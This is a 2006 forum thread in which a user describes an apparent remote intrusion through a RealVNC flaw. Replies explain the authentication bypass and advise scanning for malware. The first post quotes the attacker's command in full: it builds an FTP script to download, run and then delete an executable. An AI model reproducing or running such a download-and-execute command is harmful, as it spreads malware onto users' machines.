Go Back   Computer Forums > General Computing > Hardware
Join Computer forums Today

Thread Tools Search this Thread Display Modes
Old 10-02-2006, 02:32 PM   #1
Baseband Member
Phire111's Avatar
Join Date: Jun 2005
Posts: 83
Default Have I just been hacked?

Wierd thing happened recently...

i was minding my own business when suddenly my start button was pressed without me pressing anything...then the "Run..." dialog box opened...and this was pasted inside: "cmd /c echo OPEN 9382>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit" ... and then the cmd.exe window popped open and said it opened my binary mode data connection.

wtf is redworld. virus? trojan?

Edit: Did some research and found out it has something to do with the software "VNC 4.1.1". Anyone care to delve deeper into this wierd problem?

Phire111 is offline   Reply With Quote
Old 10-02-2006, 02:43 PM   #2
Baseband Member
Bran's Avatar
Join Date: Jun 2006
Posts: 29
Send a message via AIM to Bran
Default Re: Have I just been hacked?

VNC is a remote desktop software. I would check if you have it installed on your computer.

Bran is offline   Reply With Quote
Old 10-02-2006, 02:44 PM   #3
In Runtime
Join Date: Dec 2005
Posts: 184
Send a message via AIM to Bloodstalker999
Default Re: Have I just been hacked?

security hole has surfaced in a program IT administrators use to access remote machines, but fixes are available.

A flaw in the authentication process of RealVNC (Virtual Network Computing) software could allow attackers to gain remote access to an affected VNC server and compromise it, Cupertino, Calif.-based AV giant Symantec Corp. warned in a message to customers of its DeepSight Threat Management System.

"During the initial handshake and authentication process between VNC clients and servers, a list of authentication methods is sent to clients," Symantec said. "The client chooses a method and returns a byte specifying the method it wishes to continue with."

The flaw appears because the server doesn't properly validate that the requested method sent by the client is actually one of the methods allowed by the server. "This issue allows remote attackers to request an anonymous authentication method, which will be incorrectly accepted by the server," Symantec said. "This allows them to gain full control of the VNC server session."

However there is a fix for this issue, or it is the upgrade. I haven't tested it or read it completly.
Live forever or die trying
Bloodstalker999 is offline   Reply With Quote
Old 10-02-2006, 02:44 PM   #4
Golden Master
freestyler105's Avatar
Join Date: Sep 2006
Posts: 7,883
Default Re: Have I just been hacked?

VNC stands for Virtual Network Computing. It's basically a Remote Access Tool that lets you connect to a network over the internet. It's useful to allow people that work in a corporate enviroment to work from home. Because of the nature of these programs, they can be exploited to be used for trojans and such. Unless you use one of these programs for work, you probably have been infected with a trojan of some sort. Assuming you have antivirus/spyware, do a full system scan.

Doing a quick google for redworld2.exe just confirmed that it is definately malware. Scan for viruses ASAP.
freestyler105 is offline   Reply With Quote

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off

All times are GMT -5. The time now is 05:58 PM.

Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2016, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0